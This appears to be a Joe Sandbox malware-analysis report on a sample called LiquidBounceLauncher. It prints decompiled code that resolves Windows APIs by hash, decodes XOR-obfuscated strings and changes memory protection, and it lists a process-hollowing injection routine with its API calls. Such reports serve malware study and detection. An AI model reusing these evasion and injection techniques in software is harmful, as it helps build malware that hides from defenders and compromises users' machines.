				intOrPtr _t247;
				intOrPtr _t252;
				signed int _t258;
				signed int _t261;
				signed int _t266;
				intOrPtr _t268;
				void* _t271;
				void* _t279;
				signed int _t297;
				void* _t311;
				signed int _t312;
				signed int _t318;
				void* _t322;
				signed int _t324;
				signed int _t327;
				void* _t329;
				void* _t338;
				signed int _t340;
				signed int _t343;
				void* _t345;
				void* _t354;
				void* _t361;
				signed int _t364;
				void* _t368;
				intOrPtr _t375;
				void* _t381;
				intOrPtr* _t383;
				intOrPtr* _t384;
				signed int _t391;
				void* _t392;
				void* _t396;
				void* _t398;
				void* _t400;
				void* _t401;
				void* _t402;
				char** _t403;
				char** _t404;
				char** _t405;

				_t402 = _t401 - 0x9c;
				_v96 = 0;
				_v112 = _a24;
				_v120 = _a36;
				_v148 = _a28;
				_v128 = _a44;
				_v124 = _a32;
				_v136 = _a92;
				_v132 = _a40;
				_v140 = _a88;
				_v116 = _a64 - 0x5c;
				while(1) {
					_t224 = _v96;
					if(_t224 >= _a12) {
						break;
					}
					if(_t224 <= 0x2a) {
						E004B09A0("WHdxwVblbNfTGKiOlUygaMBQekTArfbRUCmhfExZtPGgYnJgWgdPirqBwkduLZziGoxdhACFcJxwPHBvTqJViuSIUV", _v116); // executed
					}
					if(_a4 == 0) {
						_t266 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
						while(1) {
							_v100 = _t266;
							_t268 =  *((intOrPtr*)(_v100 + 0x18));
							_t392 =  *((intOrPtr*)(_t268 +  *((intOrPtr*)(_t268 + 0x3c)) + 0x78)) + _t268;
							if(_t268 == _t392) {
								goto L17;
							}
							L7:
							_t324 =  *(_t392 + 0x18);
							_t368 = _t324 - 1;
							_v108 = _t324 * 4 - 4;
							while(_t368 != 0xffffffff) {
								_v104 =  *((intOrPtr*)(_t268 + _v108 +  *((intOrPtr*)(_t392 + 0x20)))) + _t268;
								_t391 = 0x5d5e85f4;
								while(1) {
									_v104 = _v104 + 1;
									_t276 = _v104;
									_t327 =  *((intOrPtr*)(_v104 - 1));
									if(_t327 == 0) {
										break;
									}
									_v141 = _t327 - 0x41;
									_t297 = _t327;
									if(_v141 <= 0x19) {
										_t297 = _t327 | 0x00000020;
									}
									_t391 = (_t297 ^ _t391) * 0x1000193;
								}
								_v108 = _v108 - 4;
								_t329 = _t368 - 1;
								if(_t391 != 0xe43369f5) {
									_t368 = _t329;
									continue;
								}
								_v160 = 0;
								_v164 = 0;
								_v168 = 0xb612;
								_v172 = 0;
								_t271 =  *((intOrPtr*)(_t268 +  *((intOrPtr*)(_t268 + ( *(_t368 + _t368 + _t268 +  *((intOrPtr*)(_t392 + 0x24))) & 0x0000ffff) * 4 +  *((intOrPtr*)(_t392 + 0x1c))))))();
								_t402 = _t402 - 0x10;
								E004AA310(_t276, _t392, L004ACFC0(_t271, 0x4d4100, "dAtsTYDEuXFFALbBPGARvZXMKEqRQlmyrZozsZDLZtBSesEKlQySGhhKGBaykHvOuqUZnZxCtnbzOMynRCgITjCxbB"));
								goto L18;
							}
							L17:
							_t266 =  *_v100;
							_v100 = _t266;
							_t268 =  *((intOrPtr*)(_v100 + 0x18));
							_t392 =  *((intOrPtr*)(_t268 +  *((intOrPtr*)(_t268 + 0x3c)) + 0x78)) + _t268;
							if(_t268 == _t392) {
								goto L17;
							}
							goto L7;
						}
					}
					L18:
					_v96 = _v96 + 1;
				}
				if(_a4 != 0) {
					_t225 = _v124;
					_t375 = _v128;
					asm("sbb edi, edx");
					asm("cdq");
					_v96 = _v112 * ((_v120 << 0x00000020 | _t225) << 2) + _v148 * _a12;
					_t231 = _v112;
					_t337 = _t231 * _a12 >> 0x20;
					asm("adc ebx, edi");
					_v172 = _t231 * _a12 + _v132 - (_t225 << 2);
					_v168 = _v96 + (_t231 * _a12 >> 0x20);
					_t279 =  &_v79;
					L00476DD0(0x4d4100); // executed
					_push(_t375);
					_push(_t375);
					_t235 = memcpy( &_v68, 0x4d58a0, 4 << 2);
					_t403 = _t402 + 0xc;
					_v176 = _t235;
					_v168 = 0x2e;
					_v172 = 0x10;
					 *_t403 = "770869877070653392433088656934262273324314146";
					L00415E3E(_t231 * _a12 >> 0x20);
					_v80 = 0xd;
					memset( &_v79, 0, 9 << 0);
					_t404 =  &(_t403[3]);
					_v79 = 0x66;
					_v78 = 0x68;
					_t239 = 0;
					_v77 = 0x7f;
					_v76 = 0x63;
					_v75 = 0x68;
					_v74 = 0x61;
					_v73 = 0x3e;
					_v72 = 0x3f;
					do {
						 *(_t279 + _t239) =  *(_t279 + _t239) ^ 0x0000000d;
						_t239 = _t239 + 1;
					} while (_t239 != 8);
					_v172 = _t279;
					_t381 = _t279;
					_v71 = 0;
					E0040146E(_t279,  &_v52, _t337, _t381, 0x4d58a0);
					_t338 =  &_v79;
					_push(0x4d58a0);
					_v80 = 0x45;
					memset(_t381, 0, 5 << 0);
					_t405 =  &(_t404[3]);
					_v79 = 0x6b;
					_v78 = 0x21;
					_t243 = 0;
					_v77 = 0x29;
					_v76 = 0x29;
					do {
						 *(_t338 + _t243) =  *(_t338 + _t243) ^ 0x00000045;
						_t243 = _t243 + 1;
					} while (_t243 != 4);
					_v172 = _t338;
					_v75 = 0;
					L0049EB60(_t243, _t279,  &_v52, 0x4d58a0);
					_push(_t279);
					_t383 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
					while(1) {
						_t247 =  *((intOrPtr*)(_t383 + 0x18));
						_t311 =  *((intOrPtr*)(_t247 +  *((intOrPtr*)(_t247 + 0x3c)) + 0x78)) + _t247;
						if(_t247 == _t311) {
							goto L37;
						}
						_t340 =  *(_t311 + 0x18);
						_t396 = _t340 - 1;
						_v108 = _t340 * 4 - 4;
						while(_t396 != 0xffffffff) {
							_v96 = 0x82a6c870;
							_v100 =  *((intOrPtr*)(_t247 + _v108 +  *((intOrPtr*)(_t311 + 0x20)))) + _t247;
							while(1) {
								_v100 = _v100 + 1;
								_t343 =  *((intOrPtr*)(_v100 - 1));
								if(_t343 == 0) {
									break;
								}
								_v112 = _t343 - 0x41;
								_v104 = _t343;
								if(_v112 <= 0x19) {
									_v104 = _t343 | 0x00000020;
								}
								_v96 = (_v96 ^ _v104) * 0x1000193;
							}
							_v108 = _v108 - 4;
							_t345 = _t396 - 1;
							if(_v96 != 0xa8901bd1) {
								_t396 = _t345;
								continue;
							}
							_v172 = _v52;
							_v112 =  *((intOrPtr*)(_t247 +  *((intOrPtr*)(_t247 + ( *(_t396 + _t396 + _t247 +  *((intOrPtr*)(_t311 + 0x24))) & 0x0000ffff) * 4 +  *((intOrPtr*)(_t311 + 0x1c))))))();
							_push(_t311);
							_v80 = 0;
							_t384 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
							while(1) {
								_t252 =  *((intOrPtr*)(_t384 + 0x18));
								_t398 =  *((intOrPtr*)(_t252 +  *((intOrPtr*)(_t252 + 0x3c)) + 0x78)) + _t252;
								if(_t252 == _t398) {
									goto L38;
								}
								_t312 =  *(_t398 + 0x18);
								_t354 = _t312 - 1;
								_v108 = _t312 * 4 - 4;
								while(_t354 != 0xffffffff) {
									_v96 = 0x85b5d7b3;
									_t292 =  *((intOrPtr*)(_v108 + _t252 +  *((intOrPtr*)(_t398 + 0x20)))) + _t252;
									_v100 =  *((intOrPtr*)(_v108 + _t252 +  *((intOrPtr*)(_t398 + 0x20)))) + _t252;
									while(1) {
										_v100 = _v100 + 1;
										_t318 =  *((intOrPtr*)(_v100 - 1));
										if(_t318 == 0) {
											break;
										}
										_v116 = _t318 - 0x41;
										_v104 = _t318;
										if(_v116 <= 0x19) {
											_v104 = _t318 | 0x00000020;
										}
										_t292 = _v96 ^ _v104;
										_v96 = (_v96 ^ _v104) * 0x1000193;
									}
									_v108 = _v108 - 4;
									_t322 = _t354 - 1;
									if(_v96 != 0x42c0d597) {
										_t354 = _t322;
										continue;
									}
									_t361 =  &_v68;
									_v176 = _v112;
									_v172 = _t361;
									"DeleteCriticalSection" =  *((intOrPtr*)(_t252 +  *((intOrPtr*)(_t252 + ( *(_t354 + _t354 + _t252 +  *((intOrPtr*)(_t398 + 0x24))) & 0x0000ffff) * 4 +  *((intOrPtr*)(_t398 + 0x1c))))))();
									_v172 =  &_v80;
									_v176 = 0x40;
									_v184 = _a4;
									_t405[1] = _a8;
									VirtualProtect(_t361, _t361, ??, ??); // executed
									_t364 = _v136;
									 *((intOrPtr*)(_t405 - 0x10 + 4)) = 0;
									_v176 = _v140;
									_v172 = _t364;
									_v184 = _a80;
									_t258 = E00420540();
									_v96 = _t364;
									_v100 = _t258 ^ _a116;
									L0049BC90(_t292,  &_v52, _a4, _t398, _t400);
									_t261 = _v100;
									goto L50;
								}
								L38:
								_t384 =  *_t384;
							}
						}
						L37:
						_t383 =  *_t383;
					}
				} else {
					E004AA310(_t276, _t392, L004ACFC0(_t224, 0x4d4100, "ngNqkCxrmWjitGGcQCOTdGQkkavXRgvVoCmMJWrtPacoLEYmaeIfxTNXHhKESVkqkjGjgOUYplRxfWdomQjnuOqAnl"));
					_t261 = 0;
				}
				L50:
				return _t261;
			}






















































































                                                                                                                                                                                      0x00415eca
                                                                                                                                                                                      0x00415ed6
                                                                                                                                                                                      0x00415edd
                                                                                                                                                                                      0x00415ee3
                                                                                                                                                                                      0x00415ee9
                                                                                                                                                                                      0x00415ef2
                                                                                                                                                                                      0x00415ef8
                                                                                                                                                                                      0x00415efe
                                                                                                                                                                                      0x00415f04
                                                                                                                                                                                      0x00415f0a
                                                                                                                                                                                      0x00415f16
                                                                                                                                                                                      0x00415f19
                                                                                                                                                                                      0x00415f19
                                                                                                                                                                                      0x00415f1f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00415f28
                                                                                                                                                                                      0x00415f38
                                                                                                                                                                                      0x00415f38
                                                                                                                                                                                      0x00415f41
                                                                                                                                                                                      0x00415f50
                                                                                                                                                                                      0x00415f53
                                                                                                                                                                                      0x00415f53
                                                                                                                                                                                      0x00415f59
                                                                                                                                                                                      0x00415f63
                                                                                                                                                                                      0x00415f67
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00415f6d
                                                                                                                                                                                      0x00415f6d
                                                                                                                                                                                      0x00415f77
                                                                                                                                                                                      0x00415f7a
                                                                                                                                                                                      0x00415f7d
                                                                                                                                                                                      0x00415f93
                                                                                                                                                                                      0x00415f96
                                                                                                                                                                                      0x00415f9b
                                                                                                                                                                                      0x00415f9b
                                                                                                                                                                                      0x00415f9e
                                                                                                                                                                                      0x00415fa1
                                                                                                                                                                                      0x00415fa6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00415fbe
                                                                                                                                                                                      0x00415fcb
                                                                                                                                                                                      0x00415fce
                                                                                                                                                                                      0x00415fd3
                                                                                                                                                                                      0x00415fd3
                                                                                                                                                                                      0x00415fd8
                                                                                                                                                                                      0x00415fd8
                                                                                                                                                                                      0x00415fa8
                                                                                                                                                                                      0x00415fb2
                                                                                                                                                                                      0x00415fb5
                                                                                                                                                                                      0x00415fb7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00415fb7
                                                                                                                                                                                      0x00415ff2
                                                                                                                                                                                      0x00415ffa
                                                                                                                                                                                      0x00416002
                                                                                                                                                                                      0x0041600a
                                                                                                                                                                                      0x00416011
                                                                                                                                                                                      0x00416013
                                                                                                                                                                                      0x0041602d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041602d
                                                                                                                                                                                      0x00416034
                                                                                                                                                                                      0x00416037
                                                                                                                                                                                      0x00415f53
                                                                                                                                                                                      0x00415f59
                                                                                                                                                                                      0x00415f63
                                                                                                                                                                                      0x00415f67
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00415f67
                                                                                                                                                                                      0x00415f53
                                                                                                                                                                                      0x0041603e
                                                                                                                                                                                      0x0041603e
                                                                                                                                                                                      0x0041603e
                                                                                                                                                                                      0x0041604a
                                                                                                                                                                                      0x00416071
                                                                                                                                                                                      0x0041607a
                                                                                                                                                                                      0x00416089
                                                                                                                                                                                      0x0041608b
                                                                                                                                                                                      0x0041609e
                                                                                                                                                                                      0x004160a1
                                                                                                                                                                                      0x004160a4
                                                                                                                                                                                      0x004160b5
                                                                                                                                                                                      0x004160b7
                                                                                                                                                                                      0x004160bf
                                                                                                                                                                                      0x004160c3
                                                                                                                                                                                      0x004160c6
                                                                                                                                                                                      0x004160d0
                                                                                                                                                                                      0x004160d1
                                                                                                                                                                                      0x004160d8
                                                                                                                                                                                      0x004160d8
                                                                                                                                                                                      0x004160da
                                                                                                                                                                                      0x004160de
                                                                                                                                                                                      0x004160e9
                                                                                                                                                                                      0x004160f1
                                                                                                                                                                                      0x004160f8
                                                                                                                                                                                      0x00416104
                                                                                                                                                                                      0x00416108
                                                                                                                                                                                      0x00416108
                                                                                                                                                                                      0x0041610a
                                                                                                                                                                                      0x0041610e
                                                                                                                                                                                      0x00416112
                                                                                                                                                                                      0x00416114
                                                                                                                                                                                      0x00416118
                                                                                                                                                                                      0x0041611c
                                                                                                                                                                                      0x00416120
                                                                                                                                                                                      0x00416124
                                                                                                                                                                                      0x00416128
                                                                                                                                                                                      0x0041612c
                                                                                                                                                                                      0x0041612c
                                                                                                                                                                                      0x00416130
                                                                                                                                                                                      0x00416131
                                                                                                                                                                                      0x00416139
                                                                                                                                                                                      0x0041613c
                                                                                                                                                                                      0x0041613e
                                                                                                                                                                                      0x00416142
                                                                                                                                                                                      0x0041614e
                                                                                                                                                                                      0x00416151
                                                                                                                                                                                      0x00416152
                                                                                                                                                                                      0x00416156
                                                                                                                                                                                      0x00416156
                                                                                                                                                                                      0x00416158
                                                                                                                                                                                      0x0041615c
                                                                                                                                                                                      0x00416160
                                                                                                                                                                                      0x00416162
                                                                                                                                                                                      0x00416166
                                                                                                                                                                                      0x0041616a
                                                                                                                                                                                      0x0041616a
                                                                                                                                                                                      0x0041616e
                                                                                                                                                                                      0x0041616f
                                                                                                                                                                                      0x00416177
                                                                                                                                                                                      0x0041617a
                                                                                                                                                                                      0x0041617e
                                                                                                                                                                                      0x00416183
                                                                                                                                                                                      0x0041618d
                                                                                                                                                                                      0x00416190
                                                                                                                                                                                      0x00416190
                                                                                                                                                                                      0x0041619a
                                                                                                                                                                                      0x0041619e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004161a4
                                                                                                                                                                                      0x004161ae
                                                                                                                                                                                      0x004161b1
                                                                                                                                                                                      0x004161b4
                                                                                                                                                                                      0x004161c0
                                                                                                                                                                                      0x004161d1
                                                                                                                                                                                      0x004161d4
                                                                                                                                                                                      0x004161d4
                                                                                                                                                                                      0x004161da
                                                                                                                                                                                      0x004161df
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004161f8
                                                                                                                                                                                      0x00416202
                                                                                                                                                                                      0x00416205
                                                                                                                                                                                      0x0041620d
                                                                                                                                                                                      0x0041620d
                                                                                                                                                                                      0x0041621c
                                                                                                                                                                                      0x0041621c
                                                                                                                                                                                      0x004161e1
                                                                                                                                                                                      0x004161ec
                                                                                                                                                                                      0x004161ef
                                                                                                                                                                                      0x004161f1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004161f1
                                                                                                                                                                                      0x00416237
                                                                                                                                                                                      0x0041623c
                                                                                                                                                                                      0x0041623f
                                                                                                                                                                                      0x00416240
                                                                                                                                                                                      0x00416250
                                                                                                                                                                                      0x0041625e
                                                                                                                                                                                      0x0041625e
                                                                                                                                                                                      0x00416268
                                                                                                                                                                                      0x0041626c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041626e
                                                                                                                                                                                      0x00416271
                                                                                                                                                                                      0x0041627b
                                                                                                                                                                                      0x0041627e
                                                                                                                                                                                      0x00416286
                                                                                                                                                                                      0x00416294
                                                                                                                                                                                      0x00416296
                                                                                                                                                                                      0x00416299
                                                                                                                                                                                      0x00416299
                                                                                                                                                                                      0x0041629f
                                                                                                                                                                                      0x004162a4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004162bd
                                                                                                                                                                                      0x004162c7
                                                                                                                                                                                      0x004162ca
                                                                                                                                                                                      0x004162d2
                                                                                                                                                                                      0x004162d2
                                                                                                                                                                                      0x004162d8
                                                                                                                                                                                      0x004162e1
                                                                                                                                                                                      0x004162e1
                                                                                                                                                                                      0x004162a6
                                                                                                                                                                                      0x004162b1
                                                                                                                                                                                      0x004162b4
                                                                                                                                                                                      0x004162b6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004162b6
                                                                                                                                                                                      0x004162fb
                                                                                                                                                                                      0x004162fe
                                                                                                                                                                                      0x00416301
                                                                                                                                                                                      0x0041630f
                                                                                                                                                                                      0x00416314
                                                                                                                                                                                      0x0041631b
                                                                                                                                                                                      0x00416323
                                                                                                                                                                                      0x00416326
                                                                                                                                                                                      0x0041632a
                                                                                                                                                                                      0x00416335
                                                                                                                                                                                      0x0041633b
                                                                                                                                                                                      0x00416343
                                                                                                                                                                                      0x0041634a
                                                                                                                                                                                      0x0041634e
                                                                                                                                                                                      0x00416351
                                                                                                                                                                                      0x0041635c
                                                                                                                                                                                      0x0041635f
                                                                                                                                                                                      0x00416362
                                                                                                                                                                                      0x0041636a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0041636a
                                                                                                                                                                                      0x0041625c
                                                                                                                                                                                      0x0041625c
                                                                                                                                                                                      0x0041625c
                                                                                                                                                                                      0x0041625e
                                                                                                                                                                                      0x00416255
                                                                                                                                                                                      0x00416255
                                                                                                                                                                                      0x00416255
                                                                                                                                                                                      0x0041604c
                                                                                                                                                                                      0x00416063
                                                                                                                                                                                      0x00416068
                                                                                                                                                                                      0x0041606a
                                                                                                                                                                                      0x00416381
                                                                                                                                                                                      0x00416388

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                      • String ID: !$)$)$.$770869877070653392433088656934262273324314146$>$?$@$E$WHdxwVblbNfTGKiOlUygaMBQekTArfbRUCmhfExZtPGgYnJgWgdPirqBwkduLZziGoxdhACFcJxwPHBvTqJViuSIUV$\M$a$dAtsTYDEuXFFALbBPGARvZXMKEqRQlmyrZozsZDLZtBSesEKlQySGhhKGBaykHvOuqUZnZxCtnbzOMynRCgITjCxbB$h$k$ngNqkCxrmWjitGGcQCOTdGQkkavXRgvVoCmMJWrtPacoLEYmaeIfxTNXHhKESVkqkjGjgOUYplRxfWdomQjnuOqAnl
                                                                                                                                                                                      • API String ID: 544645111-2702187267
                                                                                                                                                                                      • Opcode ID: cf986163283d9eb947e8901f604437f0d4f8a3add31f4d74bfe0c90a9781157d
                                                                                                                                                                                      • Instruction ID: b78700238358b2fa5740941e47e77b9670d55c4ffdc6963ac8e296e9b4c4a9fd
                                                                                                                                                                                      • Opcode Fuzzy Hash: cf986163283d9eb947e8901f604437f0d4f8a3add31f4d74bfe0c90a9781157d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 78F15570904358CFDB10CFA8C484A9EBBF2FF89314F25856AD858AB345D778A986CF45
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004D2381 Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 467threadinjectionmemoryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 492 4d2381-4d2391 493 4d2397-4d239b 492->493 494 4d2973 492->494 493->494 495 4d23a1-4d2563 call 4d234c * 2 493->495 496 4d2975-4d297b 494->496 501 4d2565-4d2585 call 4d2257 495->501 501->494 504 4d258b-4d258f 501->504 504->501 505 4d2591 504->505 506 4d2593-4d25f1 505->506 510 4d2609-4d260b 506->510 511 4d25f3-4d25f9 506->511 513 4d260e-4d261e 510->513 511->510 512 4d25fb-4d25ff 511->512 512->510 514 4d2601-4d2607 512->514 513->494 515 4d2624-4d2630 513->515 514->513 515->494 516 4d2636-4d2644 515->516 516->494 517 4d264a-4d2667 CreateProcessW 516->517 518 4d266d-4d267c GetThreadContext 517->518 519 4d2932 517->519 518->519 521 4d2682-4d26a0 ReadProcessMemory 518->521 520 4d2934-4d2938 519->520 523 4d294a-4d294e 520->523 524 4d293a-4d2944 520->524 521->519 522 4d26a6-4d26ac 521->522 525 4d26bd-4d26d4 VirtualAlloc 522->525 526 4d26ae-4d26b7 522->526 527 4d2956-4d2958 523->527 528 4d2950 523->528 524->523 525->519 531 4d26da-4d26f2 VirtualAllocEx 525->531 526->519 526->525 529 4d295a-4d2960 527->529 530 4d2964-4d296d 527->530 528->527 529->530 530->494 530->506 534 4d2735-4d274a 531->534 535 4d26f4-4d26f6 531->535 540 4d274c-4d2752 534->540 541 4d277a-4d2789 534->541 536 4d26f8-4d270e 535->536 537 4d2710-4d2723 535->537 539 4d2724-4d272f 536->539 537->539 539->519 539->534 543 4d2754-4d2776 540->543 544 4d278f-4d2793 541->544 545 4d2810-4d2822 WriteProcessMemory 541->545 554 4d2778 543->554 544->545 547 4d2795-4d27a6 544->547 545->520 548 4d2828-4d283f VirtualProtectEx 545->548 547->545 551 4d27a8-4d27b6 547->551 548->520 549 4d2845-4d284e 548->549 552 4d28bf-4d28cb VirtualFree 549->552 553 4d2850-4d2856 549->553 555 4d27f9-4d280e 551->555 556 4d27b8-4d27c0 551->556 552->520 560 4d28cd-4d28e6 WriteProcessMemory 552->560 557 4d2858-4d285f 553->557 554->541 555->545 555->551 558 4d27e6-4d27f7 556->558 559 4d27c2-4d27e3 556->559 561 4d287a-4d287c 557->561 562 4d2861-4d2863 557->562 558->555 558->556 559->558 560->520 563 4d28e8-4d2906 SetThreadContext 560->563 567 4d287e 561->567 568 4d2883-4d288e 561->568 565 4d2869-4d2878 562->565 566 4d2865-4d2867 562->566 563->520 564 4d2908-4d2913 ResumeThread 563->564 564->520 569 4d2915-4d2919 564->569 571 4d288f-4d28a9 VirtualProtectEx 565->571 570 4d2880-4d2881 566->570 567->570 568->571 572 4d291b 569->572 573 4d2921-4d2925 569->573 570->571 574 4d28bd 571->574 575 4d28ab-4d28bb 571->575 572->573 576 4d292d-4d2930 573->576 577 4d2927 573->577 574->552 575->557 575->574 576->496 577->576
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 004D2662
                                                                                                                                                                                      • GetThreadContext.KERNELBASE(?,00010007), ref: 004D2677
                                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 004D2698
                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 004D26CA
                                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 004D26EA
                                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000), ref: 004D281D
                                                                                                                                                                                      • VirtualProtectEx.KERNELBASE(?,?,?,00000002,?), ref: 004D283A
                                                                                                                                                                                      • VirtualProtectEx.KERNELBASE(?,?,?,00000001,?), ref: 004D28A4
                                                                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004D28C6
                                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 004D28E1
                                                                                                                                                                                      • SetThreadContext.KERNELBASE(?,00010007), ref: 004D28FE
                                                                                                                                                                                      • ResumeThread.KERNELBASE(?), ref: 004D290B
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Virtual$Process$MemoryThread$AllocContextProtectWrite$CreateFreeReadResume
                                                                                                                                                                                      • String ID: D
                                                                                                                                                                                      • API String ID: 12256240-2746444292
                                                                                                                                                                                      • Opcode ID: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
                                                                                                                                                                                      • Instruction ID: 42644f6fa975a7c554b910d8666473c5fefd7da7d8c32d0a514a7d428dcc192c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
                                                                                                                                                                                      • Instruction Fuzzy Hash: 82122A71E00219ABDF25CFA4CD94BEEBBB4FF14704F1484AAE509E6250E7749A85CF18
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00401340 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 58libraryloaderCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 578 401340-401359 GetModuleHandleA 579 401410-40141f 578->579 580 40135f-40139d LoadLibraryA GetProcAddress * 2 578->580 581 4013a2-4013a4 579->581 580->581 582 4013a6-4013ae 581->582 583 4013b7-4013be 581->583 582->583 584 4013c0-4013d6 GetModuleHandleA 583->584 585 4013fa-40140c atexit 583->585 586 4013d8-4013eb GetProcAddress 584->586 587 4013ed-4013ef 584->587 586->587 587->585 588 4013f1 587->588 588->585
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressProc$HandleModule$LibraryLoadatexit
                                                                                                                                                                                      • String ID: _Jv_RegisterClasses$__deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll$libgcj-16.dll$pFB
                                                                                                                                                                                      • API String ID: 2016387483-4241064348
                                                                                                                                                                                      • Opcode ID: 49a10ee56c2eecd6a4ce905f8a72bd3ab17cb198cc1959d3cc9b67b8c3af97bd
